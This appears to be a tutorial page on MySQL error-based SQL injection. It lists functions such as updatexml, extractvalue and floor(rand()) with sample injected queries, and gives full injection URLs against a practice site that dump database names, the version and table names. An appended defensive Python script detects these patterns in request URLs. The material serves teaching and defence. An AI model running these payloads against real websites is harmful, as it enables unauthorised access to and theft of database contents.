select * from article where id = 11

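(Debug information: this highlighted area only prints the SQL statement to help you understand SQL injection; a normal website would not show it on the page.)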

Query-based error injection
Time: 2018-05-10 11:34:42
Functions used for error-based injection
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
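Error-based injection has one precondition: when the SQL statement is executed, the code must output the result of mysqli_error(), as follows. Without that output the database error text never reaches the response, which is why production code should log database errors rather than print them.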
$result = mysqli_query($conn,$sql) or die(mysqli_error($conn));
Practice address (at the bottom of the left-hand navigation bar):
http://xss.tv/sql-article/addarticle.php
Dumping data with the injection functions
Get the number of databases:
http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,count(schema_name),0x7e) from information_schema.schemata)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Use limit to get all database names:
http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e, schema_name, 0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- -
2. Error via ExtractValue
and extractvalue(1, payload)
http://xss.tv/sql-article/showarticle.php?id=1319' and extractvalue(1, concat(0x7e,(select @@version),0x7e)) and updatexml(1,concat(0x23,(select table_name from information_schema.tables where table_schema='newblog' limit 0,1),0x23),1)-- -
3. Error via UpdateXML
+and updatexml(1,payload,1)
http://xss.tv/sql-article/showarticle.php?id=1319' and updatexml(1, concat(0x7e,(select @@version),0x7e),1)-- -
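A defender-side detection sketch, added here and not part of the original page: it flags request URLs whose decoded query string calls one of the functions listed above together with a subquery. The function names come from this page; the regexes, helper names and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Function names taken from the list on this page; each can make MySQL
# echo subquery output inside an error message.
ERROR_FUNCS = ("extractvalue", "updatexml", "geometrycollection", "multipoint",
               "polygon", "multipolygon", "linestring", "multilinestring", "exp")
FUNC_RE = re.compile(r"\b(" + "|".join(ERROR_FUNCS) + r")\s*\(")
# floor() variant: floor(rand(0)*2) combined with GROUP BY.
FLOOR_RE = re.compile(r"floor\s*\(\s*rand\s*\(.*\bgroup\s+by\b", re.S)
SUBQUERY_RE = re.compile(r"\(\s*select\b")

def normalize(query):
    """URL-decode up to three times, strip /* */ comments, collapse whitespace."""
    text = query
    for _ in range(3):                      # bounded loop handles double encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)   # /**/ used as a space
    return re.sub(r"\s+", " ", text).lower()

def classify(url):
    """Return the sorted technique names found in the URL's query string."""
    text = normalize(urlsplit(url).query)
    if not SUBQUERY_RE.search(text):        # a bare word such as "exp(" is not enough
        return []
    hits = set(FUNC_RE.findall(text))
    if FLOOR_RE.search(text):
        hits.add("floor")
    return sorted(hits)

# Constructed sample requests (not real traffic); paths mirror the practice URL.
SAMPLE_REQUESTS = [
    "/sql-article/showarticle.php?id=11",
    "/sql-article/showarticle.php?id=1%27+and+updatexml(1,concat(0x7e,(select+user()),0x7e),1)--+-",
    "/sql-article/showarticle.php?id=1%2527/**/and/**/extractvalue(1,concat(0x7e,(select/**/user()),0x7e))--+-",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req) or "clean", req)
```

A match is a signal for review, not proof of compromise; pair it with a check that responses never contain raw database error text.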